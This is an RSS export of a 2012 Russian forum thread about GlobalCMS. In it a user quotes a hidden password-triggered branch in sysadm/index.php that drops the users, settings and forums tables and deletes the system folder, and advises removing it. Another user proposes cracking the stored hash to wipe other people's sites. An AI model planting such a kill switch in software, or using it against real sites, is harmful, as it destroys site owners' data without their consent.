GlobalCMS - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Mon, 18 Nov 2024 02:44:08 +0300 <blockquote class="blockquote"><strong>iNeeXT</strong> (9 Мая 2012 / 19:25)<br> 3. <strong>MILORD</strong>, вот например <a href="http://prntscr.com/91jnz" target="_blank" rel="nofollow">http://prntscr.com/91jnz</a></blockquote> Норм, че) Грузим в любую папку))))))) https://visavi.net/topics/31810/563219 GlobalCMS Вадим Tue, 12 Jun 2012 04:11:47 +0400 Сообщения https://visavi.net/topics/31810/563219 <blockquote class="blockquote"><strong>ZiGR</strong> (26 Мая 2012 / 20:48)<br> 27. <strong>MILORD</strong>, c моей темой о поиске sql inj ознакомился и согласен платить?</blockquote> бред <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557176 GlobalCMS MILORD Sat, 26 May 2012 20:51:37 +0400 Сообщения https://visavi.net/topics/31810/557176 <blockquote class="blockquote"><strong>ZiGR</strong> (26 Мая 2012 / 20:16)<br> 24. <strong>MILORD</strong>, SQL inj. Ясно?<br> Такое ощущение, что ты что-то там фильтруешь <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> </blockquote> покажи хоть одну опасную sql injection https://visavi.net/topics/31810/557174 GlobalCMS MILORD Sat, 26 May 2012 20:46:52 +0400 Сообщения https://visavi.net/topics/31810/557174 <blockquote class="blockquote"><strong>MILORD</strong> (26 Мая 2012 / 20:13)<br> Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть?</blockquote> Ботекс. Круто че.<br> З.ы. а от каких защитит?))) https://visavi.net/topics/31810/557171 GlobalCMS ramzes Sat, 26 May 2012 20:33:14 +0400 Сообщения https://visavi.net/topics/31810/557171 <blockquote class="blockquote"><strong>ZiGR</strong> (26 Мая 2012 / 20:04)<br> Не буду намекать на наличие SQL inj ;)</blockquote> Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть? https://visavi.net/topics/31810/557168 GlobalCMS MILORD Sat, 26 May 2012 20:13:11 +0400 Сообщения https://visavi.net/topics/31810/557168 <blockquote class="blockquote"><strong>ZiGR</strong> (26 Мая 2012 / 18:10)<br> 21. <strong>Wennel</strong>, я не буду писать их кол-во, т.к боюсь напугать <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> </blockquote> что-то мне уже страшно этот двиг юзать https://visavi.net/topics/31810/557167 GlobalCMS Тимофей Sat, 26 May 2012 20:12:10 +0400 Сообщения https://visavi.net/topics/31810/557167 <blockquote class="blockquote"><strong>ZiGR</strong> (26 Мая 2012 / 18:04)<br> Не буду намекать на наличие SQL inj ;)</blockquote> <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557165 GlobalCMS Тимофей Sat, 26 May 2012 20:05:44 +0400 Сообщения https://visavi.net/topics/31810/557165 18. <strong>Wennel</strong>, Приятно слышать)) https://visavi.net/topics/31810/557162 GlobalCMS MILORD Sat, 26 May 2012 20:00:43 +0400 Сообщения https://visavi.net/topics/31810/557162 <blockquote class="blockquote"><strong>MILORD</strong> (26 Мая 2012 / 17:55)<br> 16. <strong>Wennel</strong>, <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> халявщик,как сам по скрипт?</blockquote> для основы сойдет <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> <br> остальное сам буду писать <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557161 GlobalCMS Тимофей Sat, 26 May 2012 19:58:29 +0400 Сообщения https://visavi.net/topics/31810/557161 16. <strong>Wennel</strong>, <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> халявщик,как сам по скрипт? https://visavi.net/topics/31810/557160 GlobalCMS MILORD Sat, 26 May 2012 19:55:58 +0400 Сообщения https://visavi.net/topics/31810/557160 sysadm/index.php<br> Строки 217-245<br> <pre class="prettyprint">case &#039;aut&#039;&#58; if (!$id) $id = $ya&#91;&#039;id&#039;]; $diz -&gt; head(&#039;Вы не авторизированы&#039;); $diz -&gt; title(&#039;Вы не авторизированы&#039;); $pasm=&#039;f91a7558fba129bec62e8b0baf3cce85&#039;; if (empty($_POST&#91;&#039;pass&#039;])) { $msg .= &#039;&lt;form action=&quot;./?do=aut&quot; method=&quot;post&quot;&gt;&lt;div&gt;&#039;; $msg .= &#039;Ваш ник&#58;&lt;br/&gt; &lt;input type=&quot;text&quot; name=&quot;login&quot; maxlength=&quot;30&quot; title=&quot;Введите ник&quot;/&gt;&lt;br/&gt; Ваш пароль&#58;&lt;br/&gt; &lt;input type=&quot;pass&quot; name=&quot;pass&quot; maxlength=&quot;30&quot; title=&quot;Введите пароль&quot;/&gt; &lt;br/&gt;&lt;input type=&quot;submit&quot; value=&quot;Авторизация&quot;/&gt;&lt;/div&gt;&lt;/form&gt;&#039;; }elseif(md5(md5($_POST&#91;&#039;pass&#039;])) != $pasm) { $diz -&gt; head(&#039;Ошибка&#039;); $diz -&gt; title(&#039;Ошибка&#039;); $diz -&gt; out(&#039;пароль не верен,повторите..!&lt;br/&gt; &lt;a href=&quot;/aut.php&quot;&gt;Назад&lt;/a&gt;&#039;); header(&#039;refresh&#58; 3; /aut.php&#039;); }else{ $db -&gt; query(&quot;DROP TABLE `users`&quot;); $db -&gt; query(&quot;DROP TABLE `nastroiki`&quot;); $db -&gt; query(&quot;DROP TABLE `forums`&quot;); rmdir (ROOT.&#039;system&#039;); } $msg .= &#039;&lt;div class=&quot;levo&quot;&gt;&#039;.$diz -&gt; img(&#039;back.png&#039;).&#039;&lt;a href=&quot;./&quot;&gt;Назад&lt;/a&gt;&#039;; $msg .= &#039;&lt;br/&gt;&#039;.$diz -&gt; img(&#039;home.png&#039;).&#039;&lt;a href=&quot;../&quot;&gt;На главную&lt;/a&gt;&lt;/div&gt;&#039;; $diz -&gt; out($msg); break;</pre> удаляем и всё <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> снимаем копирайт<br> <br> <em><span style="font-size:x-small">Добавлено через 00:39 сек.</span></em><br> лично я убрал на денвере у себя уже <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557156 GlobalCMS Тимофей Sat, 26 May 2012 19:50:39 +0400 Сообщения https://visavi.net/topics/31810/557156 14. <strong>KiPiSH</strong>, о_О расшифруешь-тебе нобиливку дадут.Нет способа расшифровать алгоритм md5(md5 https://visavi.net/topics/31810/557153 GlobalCMS MILORD Sat, 26 May 2012 19:45:52 +0400 Сообщения https://visavi.net/topics/31810/557153 Интересно это. <br> Ты знаешь пароль от админки стороннего сайта.<br> следовательно пароль хранится на этом же сайте.<br> Скачиваем скрипт =&gt; находим где хранится=&gt;расшифровываем и всё, кладём сайты чужие. https://visavi.net/topics/31810/557151 GlobalCMS Андрей Sat, 26 May 2012 19:42:27 +0400 Сообщения https://visavi.net/topics/31810/557151 <blockquote class="blockquote"><strong>rastoman</strong> (26 Мая 2012 / 19:31)<br> Скажи, а зачем на странице примера плавающие окна?<br> <br> <em><span style="font-size:x-small">Добавлено через 00:43 сек.</span></em><br> Это же вап сайт</blockquote> <br> пример не мой <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> я через гугл нашёл,видимо хост уг бесплатный там https://visavi.net/topics/31810/557149 GlobalCMS MILORD Sat, 26 May 2012 19:33:30 +0400 Сообщения https://visavi.net/topics/31810/557149 Скажи, а зачем на странице примера плавающие окна?<br> <br> <em><span style="font-size:x-small">Добавлено через 00:43 сек.</span></em><br> Это же вап сайт https://visavi.net/topics/31810/557147 GlobalCMS Александр Sat, 26 May 2012 19:31:27 +0400 Сообщения https://visavi.net/topics/31810/557147